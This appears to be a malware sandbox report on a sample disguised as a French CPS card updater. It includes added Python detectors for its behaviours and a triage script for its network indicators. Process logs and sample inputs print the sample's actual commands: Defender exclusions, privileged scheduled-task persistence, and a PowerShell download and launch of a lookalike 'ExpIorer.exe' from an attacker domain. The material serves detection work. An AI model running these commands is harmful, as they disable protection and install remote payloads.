| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe
"C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Mise à jour carte CPS.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Mise à jour carte CPS" /tr "C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {C86A1B4E-04DB-4EF4-A1E7-330C0FD20D2F} S-1-5-21-3452737119-3959686427-228443150-1000:QGTQZTRE\Admin:Interactive:[1]
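The Processes lists of the behavioral2 and behavioral1 analyses record the three behaviours a detection engineer would alert on from this sample: Defender exclusions added through Add-MpPreference, scheduled tasks created with /rl highest on an onlogon or one-minute trigger, and PowerShell downloading into %Temp% executables whose names mimic explorer.exe (ExpIorer.exe with a capital I in place of the l). The Python below is an added example written for this page, not code from the sandbox, the report or the malware. It runs over command lines copied from the two process lists plus three constructed benign lines, and flags each pattern. The list of system binaries, the homoglyph map and the edit-distance threshold are assumptions chosen for the example.

```python
import re
from dataclasses import dataclass

# Sample input: command lines copied from the behavioral2 / behavioral1
# process lists in this report, plus three constructed benign lines at the
# end (timeout, schtasks /query and Get-MpPreference are controls, not findings).
SAMPLE_LOG = r"""
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Mise à jour carte CPS.exe'
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Mise à jour carte CPS" /tr "C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe"
schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
timeout 3
schtasks /query /tn "Backup"
powershell Get-MpPreference
"""

# Assumptions for the example: binaries attackers like to imitate, and the
# character swaps (I/l, 1/l, 0/o) the lookalike check folds together.
SYSTEM_BINARIES = ("explorer.exe", "svchost.exe", "lsass.exe", "csrss.exe",
                   "winlogon.exe", "services.exe", "rundll32.exe")
HOMOGLYPHS = str.maketrans({"i": "l", "1": "l", "0": "o"})

DEFENDER_EXCLUSION = re.compile(
    r"Add-MpPreference\s+-Exclusion(Path|Process|Extension|IpAddress)\s+'([^']*)'", re.I)
SCHTASKS_CREATE = re.compile(r"\bschtasks\b.*?/create\b", re.I)
DOWNLOAD_FILE = re.compile(r"\.DownloadFile\(\s*'([^']*)'\s*,\s*'([^']*)'\s*\)", re.I)
START_PROCESS = re.compile(r"Start-Process\s+-FilePath\s+'([^']*)'", re.I)
IN_TEMP = re.compile(r"%temp%|\\appdata\\local\\temp\\", re.I)


@dataclass
class Finding:
    rule: str
    detail: str
    cmdline: str


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; one insertion/substitution is enough for a lookalike."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def normalize(name: str) -> str:
    return name.lower().translate(HOMOGLYPHS)


def lookalike_of(name: str):
    """Return the system binary `name` imitates, or None if it is that binary or unrelated."""
    raw = name.lower()
    for known in SYSTEM_BINARIES:
        if raw != known and edit_distance(normalize(raw), normalize(known)) <= 1:
            return known
    return None


def parse_schtasks(cmdline: str) -> dict:
    """Pull the task name, payload, trigger and run level out of a schtasks /create line."""
    def opt(pattern):
        m = re.search(pattern, cmdline, re.I)
        return m.group(1) if m else None
    return {
        "name": opt(r'/tn\s+"([^"]+)"'),
        "run": opt(r"""/tr\s+['"]+([^'"]+)"""),
        "trigger": (opt(r"/sc\s+(\w+)") or "").lower(),
        "interval": opt(r"/mo\s+(\d+)"),
        "highest": re.search(r"/rl\s+highest", cmdline, re.I) is not None,
    }


def basename(path: str) -> str:
    return path.replace("/", "\\").rstrip("\\").rsplit("\\", 1)[-1]


def scan(cmdlines):
    """Apply the three rules to each command line and return the findings."""
    findings = []
    for line in (raw.strip() for raw in cmdlines):
        if not line:
            continue
        m = DEFENDER_EXCLUSION.search(line)
        if m:
            findings.append(Finding("defender_exclusion", f"-Exclusion{m.group(1)} {m.group(2)}", line))
        if SCHTASKS_CREATE.search(line):
            t = parse_schtasks(line)
            if t["highest"] or t["trigger"] in ("onlogon", "minute"):
                findings.append(Finding("schtasks_persistence",
                                        f'{t["name"]} -> {t["run"]} (sc={t["trigger"]}, highest={t["highest"]})', line))
        dropped = [(u, d, "download_to_temp") for u, d in DOWNLOAD_FILE.findall(line)]
        dropped += [(None, p, "exec_from_temp") for p in START_PROCESS.findall(line)]
        for url, path, rule in dropped:
            if IN_TEMP.search(path):
                findings.append(Finding(rule, f"{url} -> {path}" if url else path, line))
            known = lookalike_of(basename(path))
            if known:
                findings.append(Finding("lookalike_name", f"{basename(path)} imitates {known}", line))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"[{f.rule}] {f.detail}")
```

Run against the sample lines this yields eight findings: two Defender exclusions, two persistence tasks, one download into Temp, one execution from Temp, and two lookalike names; the three control lines produce nothing. The lookalike check deliberately compares against a short allow-list of system binaries rather than every name on disk, because the edit-distance test with homoglyph folding is loose by design and would otherwise flag legitimate installers.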
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | dentiste.ddns.net | udp |
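The Network tables of both detonations mix three kinds of rows: reverse (in-addr.arpa) lookups the sandbox performs on every peer, which are noise; connections to shared services the report flags as abused (pastebin.com, api.telegram.org), which are indicators but cannot simply be blocked; and a bare IP on a non-web port with no name resolution, which is the kind of endpoint worth a firewall rule. The Python below is an added example written for this page, not tooling from the sandbox. It parses rows copied from the two tables (including the rows where an empty Domain column shifts the protocol one cell left), classifies each flow and builds a de-duplicated indicator summary. The abused-service set and the port heuristic are assumptions for the example.

```python
from dataclasses import dataclass

# Sample input: rows copied from the behavioral2 and behavioral1 Network
# tables in this report (a subset; the repeated 7000/tcp row is kept on
# purpose to show de-duplication, and two rows carry the shifted-column defect).
NETWORK_TABLE = """
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| FR | 86.68.222.14:7000 | tcp | |
| FR | 86.68.222.14:7000 | tcp | |
| US | 8.8.8.8:53 | xcu.exgaming.click | udp |
| US | 8.8.8.8:53 | xcu5.exgaming.click | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | dentiste.ddns.net | udp |
"""

# Assumption: shared services this report lists as abused for hosting/C2.
# Traffic to them is an indicator for this sample, not something to block outright.
ABUSED_SERVICES = {"pastebin.com", "api.telegram.org"}


@dataclass(frozen=True)
class Flow:
    country: str
    host: str
    port: int
    domain: str
    proto: str


def parse_rows(table: str):
    """Parse the report's pipe table; tolerate rows whose Domain cell is missing."""
    flows = []
    for line in table.strip().splitlines()[1:]:   # first line is the header
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4:
            continue
        country, dest, domain, proto = cells
        # A row with no domain arrives as "| ip:port | tcp | |": proto sits in the Domain column.
        if proto == "" and domain in ("tcp", "udp"):
            domain, proto = "", domain
        host, _, port = dest.rpartition(":")
        flows.append(Flow(country, host, int(port), domain, proto))
    return flows


def classify(f: Flow) -> str:
    if f.proto == "udp" and f.port == 53:
        if f.domain.endswith(".in-addr.arpa"):
            return "ptr_noise"          # sandbox reverse-resolving its own peers
        return "dns_query"
    if f.domain in ABUSED_SERVICES:
        return "abused_service"
    if not f.domain and f.port not in (80, 443):
        return "direct_c2"              # raw IP, non-web port, no preceding lookup
    return "other"


def triage(table: str) -> dict:
    """Collapse the table into a de-duplicated indicator summary."""
    result = {"c2_endpoints": set(), "abused_services": set(),
              "resolved_domains": set(), "ptr_noise": 0}
    for f in parse_rows(table):
        kind = classify(f)
        if kind == "direct_c2":
            result["c2_endpoints"].add(f"{f.host}:{f.port}")
        elif kind == "abused_service":
            result["abused_services"].add(f.domain)
        elif kind == "dns_query" and f.domain not in ABUSED_SERVICES:
            result["resolved_domains"].add(f.domain)
        elif kind == "ptr_noise":
            result["ptr_noise"] += 1
    return result


if __name__ == "__main__":
    for key, value in triage(NETWORK_TABLE).items():
        print(f"{key}: {sorted(value) if isinstance(value, set) else value}")
```

On the sample rows the summary separates one direct endpoint (86.68.222.14:7000), two abused services, three attacker-controlled names that were only resolved, and two reverse-lookup rows that carry no signal. Note that the report does not tie dentiste.ddns.net (resolved in behavioral1) to the 7000/tcp endpoint seen in behavioral2, so the script records them independently rather than inferring a link.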
Files
memory/2400-0-0x00000000013A0000-0x00000000013D0000-memory.dmp
memory/2400-1-0x000007FEF5390000-0x000007FEF5D7C000-memory.dmp
memory/3036-6-0x000000001B6B0000-0x000000001B992000-memory.dmp
memory/3036-8-0x0000000002810000-0x0000000002818000-memory.dmp
memory/3036-7-0x000007FEF1A80000-0x000007FEF241D000-memory.dmp
memory/3036-9-0x0000000002830000-0x00000000028B0000-memory.dmp
memory/3036-10-0x000007FEF1A80000-0x000007FEF241D000-memory.dmp
memory/3036-11-0x0000000002830000-0x00000000028B0000-memory.dmp
memory/3036-13-0x0000000002830000-0x00000000028B0000-memory.dmp
memory/3036-12-0x0000000002830000-0x00000000028B0000-memory.dmp
memory/3036-14-0x000007FEF1A80000-0x000007FEF241D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 9bbb9c3a985a9dfe84a8c247500df6cb |
| SHA1 | 1ac3ae106a5b7f84fae6a93d1c98cecb291f8850 |
| SHA256 | 44c87075f10bf00f403006fe363475e2f02289ee9c0b0f9ca2621faf13aa38f1 |
| SHA512 | da87d2fa1d20baecb41cf7ea215c966c47f361caf309b6960d910570d53d2f3a50188cf31fa19247b780ee614ae94a58aaff70c0c97b68ddb4581ad8a29ab9f2 |
memory/2604-20-0x000000001B500000-0x000000001B7E2000-memory.dmp
memory/2604-22-0x000007FEEDF10000-0x000007FEEE8AD000-memory.dmp
memory/2604-21-0x00000000027A0000-0x00000000027A8000-memory.dmp
memory/2604-23-0x0000000002960000-0x00000000029E0000-memory.dmp
memory/2604-24-0x000007FEEDF10000-0x000007FEEE8AD000-memory.dmp
memory/2604-25-0x0000000002960000-0x00000000029E0000-memory.dmp
memory/2604-27-0x000007FEEDF10000-0x000007FEEE8AD000-memory.dmp
memory/2604-26-0x0000000002960000-0x00000000029E0000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2708-34-0x000007FEF1A80000-0x000007FEF241D000-memory.dmp
memory/2708-35-0x0000000002D50000-0x0000000002DD0000-memory.dmp
memory/2708-36-0x000007FEF1A80000-0x000007FEF241D000-memory.dmp
memory/2708-39-0x0000000002D50000-0x0000000002DD0000-memory.dmp
memory/2708-38-0x0000000002D50000-0x0000000002DD0000-memory.dmp
memory/2708-37-0x0000000002D50000-0x0000000002DD0000-memory.dmp
memory/2708-40-0x000007FEF1A80000-0x000007FEF241D000-memory.dmp
memory/2360-47-0x0000000002D10000-0x0000000002D90000-memory.dmp
memory/2360-48-0x000007FEEDF10000-0x000007FEEE8AD000-memory.dmp
memory/2360-49-0x0000000002D10000-0x0000000002D90000-memory.dmp
memory/2360-51-0x0000000002D10000-0x0000000002D90000-memory.dmp
memory/2360-50-0x0000000002D10000-0x0000000002D90000-memory.dmp
memory/2360-46-0x000007FEEDF10000-0x000007FEEE8AD000-memory.dmp
memory/2400-52-0x000007FEF5390000-0x000007FEF5D7C000-memory.dmp
memory/2360-53-0x000007FEEDF10000-0x000007FEEE8AD000-memory.dmp
memory/2400-58-0x000000001ACC0000-0x000000001AD40000-memory.dmp
memory/2400-59-0x000000001ACC0000-0x000000001AD40000-memory.dmp